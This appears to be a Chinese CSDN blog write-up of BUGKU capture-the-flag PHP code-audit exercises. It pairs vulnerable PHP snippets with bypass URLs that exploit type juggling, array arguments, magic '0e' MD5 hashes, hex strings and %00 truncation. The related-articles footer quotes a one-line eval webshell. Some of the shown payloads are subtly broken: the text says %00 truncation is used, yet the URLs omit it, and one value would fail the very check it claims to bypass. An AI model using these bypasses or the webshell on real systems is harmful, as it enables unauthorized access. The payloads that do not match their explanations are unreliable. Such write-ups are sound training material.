BUGKU 代码审计练习

最新推荐文章于 2023-06-04 23:04:49 发布
最新推荐文章于 2023-06-04 23:04:49 发布
阅读量449 收藏 4
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39268483/article/details/100161154
版权

BUGKU 代码审计练习

extract变量覆盖

<?php
$flag=flag.txt;
extract($_GET);//数组键名作为变量名,使用数组键值作为变量值
if(isset($shiyan))//检测变量是否为空
{
	$content=trim(file_get_contents($flag));
	if($shiyan==$content)
	{
		echo'flag{xxx}';
	}
	else
	{
		echo'Oh.no';
	}
}
?>

因为$_GET本身就是超全局数组,在get了参数后extract把shiyan当作键名.同理把flag也当作键名,我们需要将其都设为空即可输出flag。

http://123.206.87.240:9009/1.php?shiyan=&flag=

strcmp比较字符串

<?php
$flag = "flag{xxxxx}";
if (isset($_GET['a'])) {
if (strcmp($_GET['a'], $flag) == 0) //如果 str1 小于 str2 返回 < 0; 如果 str1大于 str2返回 > 0;如果两者相等,返回 0。
//比较两个字符串(区分大小写)
die('Flag: '.$flag);//输出flag,并退出
else
print 'No';
}
?>

PHP的strcmp()函数在PHP5.3版本之前使用数组可以绕过验证

函数期望传入的类型是字符串类型的数据,要是我们传入非字符串类型的数据的话,这个函数将发生错误,但是在5.3之前的php中,显示了报错的警告信息后,将return 0 。也就是说虽然报了错,但却判定其相等了,也就绕过了判断。

http://120.24.86.145:9009/6.php?a[]=1

urldecode二次编码绕过

<?php

if(eregi("hackerDJ",$_GET['id'])) {//检验id是否为hackerDJ
echo("not allowed!");
exit();
}
//var_dump($_GET['id']);
$_GET['id'] = urldecode($_GET['id']);
if($_GET['id'] == "hackerDJ")
{
echo "Access granted!";
echo "flag";
}
?>

当我们传入$_GET时,会自动将参数先urldecode一次,之后将输入再urldecode一次,我们只需要将

hackerDJ=%68%61%63%6b%65%72%44%4a

再进行一次编码即可

http://123.206.87.240:9009/10.php?id=%68%61%63%6b%65%72%44%4a

md5函数

<?php
error_reporting(0);
$flag = 'flag{test}';
if (isset($_GET['username']) and isset($_GET['password'])) {
if ($_GET['username'] == $_GET['password'])
print 'Your password can not be your username.';
else if (md5($_GET['username']) === md5($_GET['password']))
die('Flag: '.$flag);
else
print 'Invalid password';
}
?>

拿到flag的条件为,username!=password,md5(username)=md5(password).

但是md5()函数不能处理数组格式的东西。

http://123.206.87.240:9009/18.php?username[]=1&password[]=2

数组返回NULL绕过

<?php
$flag = "flag";

if (isset ($_GET['password'])) {
if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)//正则表达式 ^表示开始[] +表示一次或者多次 $表示结尾
echo 'You password must be alphanumeric';
else if (strpos ($_GET['password'], '--') !== FALSE)//查找字符串在另一字符串中第一次出现的位置
die('Flag: ' . $flag);
else
echo 'Invalid password';
}
?>

password必须要为数字和字母,但是后面一个验证字符串必须要含有’–’,有两种方法绕过

第一种http://123.206.87.240:9009/19.php?password[]=1

因为ereg和strpos函数都不能处理数组,会直接返回NULL,但是null !== False,所以可以直接绕过

第二种http://123.206.87.240:9009/19.php?password=12--

因为ereg不会解析%00之后的东西

弱类型整数大小比较绕过

<?php
$temp = $_GET['password'];
is_numeric($temp)?die("no numeric"):NULL;//检测变量是否为数字
var_dump($temp);
if($temp>1336){
echo "yes";
}
?>

条件为输入的字符不能含有数字或数字字符串且变量要大于1336

is_numeric()函数空字符%00,无论是%00放在前后都可以判断为非数值,而%20空格字符只能放在数值后

由于弱类型比较会把char类型转换为int型比较。

http://123.206.87.240:9009/22.php?password=12345

sha()函数比较绕过

<?php
$flag = "flag";
if (isset($_GET['name']) and isset($_GET['password']))
{
var_dump($_GET['name']);
echo "  ";
var_dump($_GET['password']);
var_dump(sha1($_GET['name']));
var_dump(sha1($_GET['password']));
if ($_GET['name'] == $_GET['password'])
echo '

Your password can not be your name!

';
else if (sha1($_GET['name']) === sha1($_GET['password']))
die('Flag: '.$flag);
else
echo 'Invalid password.';
?>

输出flag的要求为name不等于password 但是经过sha1加密之后要相等。但是sha1不能处理数组

http://123.206.87.240:9009/7.php?password[]=1&name[]=2

md5加密相等绕过

<?php
$md51 = md5('QNKCDZO');
$a = @$_GET['a'];
$md52 = @md5($a);
if(isset($a)){
if ($a != 'QNKCDZO' && $md51 == $md52) {
echo "flag{*}";
} else {
echo "false!!!";
}}
else{echo "please input a";}
?>

输出flag要求为不为QNKCDZO但是经过md5加密之后要相等

如果比较一个数字和字符串或者比较涉及到数字内容的字符串,则字符串会被转换为数值并且比较按照数值来进行比较

0e在比较的时候会将其视作为科学计数法,所以无论0e后面是什么,0的多少次方还是0

这里给一批md5的弱类型

QNKCDZO
0e830400451993494058024219903391

s878926199a
0e545993274517709034328855841020
  
s155964671a
0e342768416822451524974117254469
  
s214587387a
0e848240448830537924465865611904
  
s214587387a
0e848240448830537924465865611904
  
s878926199a
0e545993274517709034328855841020
  
s1091221200a
0e940624217856561557816327384675
  
s1885207154a
0e509367213418206700842008763514

http://123.206.87.240:9009/13.php?a=s878926199a

十六进制与数字比较

<?php
error_reporting(0);
function noother_says_correct($temp)
{
$flag = 'flag{test}';
$one = ord('1'); //ord — 返回字符的 ASCII 码值
$nine = ord('9'); //ord — 返回字符的 ASCII 码值
$number = '3735929054';
// Check all the input characters!
for ($i = 0; $i < strlen($number); $i++)
{
// Disallow all the digits!
$digit = ord($temp{$i});
if ( ($digit >= $one) && ($digit <= $nine) )
{
// Aha, digit not allowed!
return "flase";
}
}
if($number == $temp)
return $flag;
}
$temp = $_GET['password'];
echo noother_says_correct($temp);
?>

要求等于数字3735929054,但是不能包含字符1-9,将其转换为16进制即可0xDEADC0DE

http://123.206.87.240:9009/20.php?password=0xDEADC0DE

ereg正则%00截断

<?php
$flag = "xxx";
if (isset ($_GET['password']))
{
	if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)
	{
		echo 'You password must be alphanumeric';
	}
	else if (strlen($_GET['password']) < 8 && $_GET['password'] > 9999999)
	{
		if (strpos ($_GET['password'], '-') !== FALSE) //strpos — 查找字符串首次出现的位置
		{
			die('Flag: ' . $flag);
		}
	else
	{
		echo('- have not been found');
	}
}
else
{
	echo 'Invalid password';
}
}
?>

要求输入必须为字母数字,且长度小于8,值大于999999。(可以用科学记数法)绕过

但是输入的字符必须要包含-利用%00进行截断即可。

http://123.206.87.240:9009/5.php?password=9e9*-*

strpos数组绕过

<?php
$flag = "flag";
if (isset ($_GET['ctf'])) {
if (@ereg ("^[1-9]+$", $_GET['ctf']) === FALSE)
echo '必须输入数字才行';
else if (strpos ($_GET['ctf'], '#biubiubiu') !== FALSE)
die('Flag: '.$flag);
else
echo '骚年,继续努力吧啊~';
}
?>

输入字符必须为数字,但是字符要含有#biubiubiu,我们可以利用数组进行绕过

http://123.206.87.240:9009/15.php?ctf[]=1

数字验证正则绕过

<?php
error_reporting(0);
$flag = 'flag{test}';


$password ="42.000000000e+0";
  if (0 >= preg_match('/^[[:graph:]]{12,}$/', $password)) //preg_match — 执行一个正则表达式匹配
//[:graph:]是除空格符(空格键与[TAB]键)之外的所有按键
//{12,}至少匹配12次
  {
    echo 'flag';
    exit;
  }
  while (TRUE)
  {
    $reg = '/([[:punct:]]+|[[:digit:]]+|[[:upper:]]+|[[:lower:]]+)/';
    if (6 > preg_match_all($reg, $password, $arr))//
    break;
    $c = 0;
    $ps = array('punct', 'digit', 'upper', 'lower'); //[[:punct:]] 任何标点符号 [[:digit:]] 任何数字 [[:upper:]] 任何大写字母 [[:lower:]] 任何小写字母
    foreach ($ps as $pt)
    {
      if (preg_match("/[[:$pt:]]+/", $password))
      $c += 1;
    }
    if ($c < 3) break;
//>=3,必须包含四种类型三种与三种以上
    if ("42" == $password) 
      echo $flag;
    else echo 'Wrong password';
    exit;
  }

?>

首先传入的参数要大于12个字符,必须是非空格非TAB之外的内容,password要有大小写数字,字符内容,而且匹配到的次数要大于6次,最后password要等于42

要满足上面的条件 要么是16进制要么是科学计数法
所以payload:42.000000000e+0

playmak3r
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
代码审计 期末考试题卷(一)
06-20
代码审计 期末考试题卷(一)
[CTF] 关于php代码审计的MD5类的练习
ZXW_NUDT的博客
12-03 2674
练习1 PHP代码: <?php error_reporting(0); highlight_file("pass-01.php"); if(isset($_GET["pass"])){ if($_GET["pass"] != hash("md4", $_GET["pass"])){ die('fail~~~'); }else{ echo "success!!!<br>";
CTF练习——代码审计
HasntStartIsOver的博客
06-04 557
页面无返回值,也没有报错。说明通过了所有拦截,但是文件不存在或者是空白的。在source.php中展示了源代码,下面进行源码分析。源码中注释了source.php,直接访问该页面。一次尝试 payload =,最后获得flag。
mysql屏蔽关键字实现方法_PHP屏蔽过滤指定关键字的方法
weixin_35924353的博客
02-18 618
本文实例讲述了PHP屏蔽过滤指定关键字的方法。分享给大家供大家参考。具体分析如下:实现思路:一、把关键字专门写在一个文本文件里,每行一个,数量不限,有多少写多少。二、PHP读取关键字文本,存入一个数组三、遍历关键字数组,挨个用strpos函数去看看内容有没有关键字,如果有,返回true,没有则返回falsePHP代码如下:/* PHP中用strpos函数过滤关键字 */// 关键字过滤函数func...
php代码审计
qq_48008847的博客
07-12 2408
通用代码审计思路 •根据敏感关键字回溯参数传递过程(逆向追踪) •检查敏感函数的参数,进行回溯变量,判断变量是否可控并且没有经过严格的过滤,这是一个逆向追踪的过程。 •寻找可控参数,正向追踪变量传递过程(正向追踪)•跟踪传递的参数,判断是否存入到敏感函数内或者传递的过程中具有代码逻辑漏洞。 •寻找敏感功能点,通读功能点代码(直接挖掘功能点漏洞)•根据自身经验判断在该应用中的哪些功能可能出现漏洞。 •直接通读全文代码 审计方向: 根据功能点审计:根据业务的功能来进行审计。 用浏览器进行浏览,找
杂项题目练习bugku练习
04-05
杂项题目练习bugku练习
bugku盲水印代码2b
08-16
bugku盲水印代码。用于解杂项那题(2b)。快速秒解,谁用谁知道。
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
bugku杂项题writeup
11-22
bugku杂项题writeup
bugkuctf解题-WEB
05-04
bugku writeup,web解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
zzcms83代码审计练习
10-24
提供刚刚学习代码审计的同学一起学习,其实也没有什么好说的,由于市面上比较难找,这里提供给大家方便下载,版本是8.3的。
CTF平台题库writeup(四)--BugKuCTF-代码审计(14题详解)
渗透、攻防、CTF、编程
07-04 4301
1、extract变量覆盖 <?php $flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)); if($shiyan==$content) { echo'flag{xxx}'; } else { echo'Oh.no'; } } ?> 知识点: 变量覆盖 file_get_contents():将整个文件读入一个字符串 trim()去除字符串两侧的空格或者指定
php strlen ctf,PHP代码审计——EASY CTF篇
weixin_34315803的博客
03-11 682
0x01 extract变量覆盖$flag='xxx';extract($_GET);if(isset($shiyan)){$content=trim(file_get_contents($flag));if($shiyan==$content){echo'ctf{xxx}';}else{echo'Oh.no';}}?>?shiyan=&flag=1在file_get_content...
php常用函数wps,[WPSEC]——WP
weixin_36140683的博客
03-10 269
1图片.png2图片.png同时GET,POST3【代码审计】之变量覆盖一flag In the variable !flag In the variable !error_reporting(0);include "flag1.php";highlight_file(__file__);if(isset($_GET['args'])){$args = $_GET['args'];if(!preg...
CTF代码审计
weixin_43749601的博客
10-20 2058
extract变量覆盖 <?php $flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)); if($shiyan==$content) { echo'flag{xxx}'; } else { echo'Oh.no'; } } ?> 1、extract()函数使用数组键名作为变量名,使用数组键值作为变量的值,当变量中有
Java代码审计面试
悦分享
09-16 2686
Java的序列化和反序列化本身并不存在问题,但如果java应用对用户输入,即不可信数据做了反序列化处理,那么攻击者可以通过构造恶意输入,让反序列化产生非预期的对象,而非预期的对象在产生过程中就有可能带来任意代码执行的后果。相比之下,更常见的是各种表达式的执行,包括但不限于 SpEL、OGNL、MVEL2、EL等,在不同的环境下程序和框架可能使用了不同的表达式解析/模板引擎,在使用和配置有误的情况下,将导致任意表达式执行。正因为此,java提供的标准库及大量第三方公共类库成为反序列化漏洞利用的关键。
寒假AWD训练之初学代码审计
qq_42728977的博客
01-17 1158
寒假在家,老师组织了AWD训练赛,还是实战出真知,感觉比赛的学习效率是真的高。做个小总结。 也是刚入门,欢迎大佬斧正。 漏洞1:webshell.php 第一个漏洞是后门的,是一句话木马。 <?php @eval($_POST['moxiaoxi']) ?> 很简单,没有什么难度,可以直接菜刀,但是菜刀不能批量自动化获取flag。所以,尝试着写脚本。 import requests ...
7月28日ctfweb源码泄露及代码审计训练题
slc3315的博客
07-28 2816
1.试试手 题目: // 题目是php界面信息 <?php highlight_file(__FILE__); include 'flag.php'; if (isset($_GET['p1'])){ if ($_GET['p1'] > 99999999 && strlen($_GET['p1']) < 9){ echo "111"; if (isset ( $_GET ['p2'] )) { $
node-v12.16.3-x86.msi
最新发布
04-25
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
Bugku post
09-21
根据提供的引用内容,Bugku post是一个题目的要求,要求在两秒内提交一道很长的计算题答案,并且式子每次刷新都会变动。需要使用POST方式传入一个变量名为value的值。具体的解题步骤包括创建一个Python文件,导入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值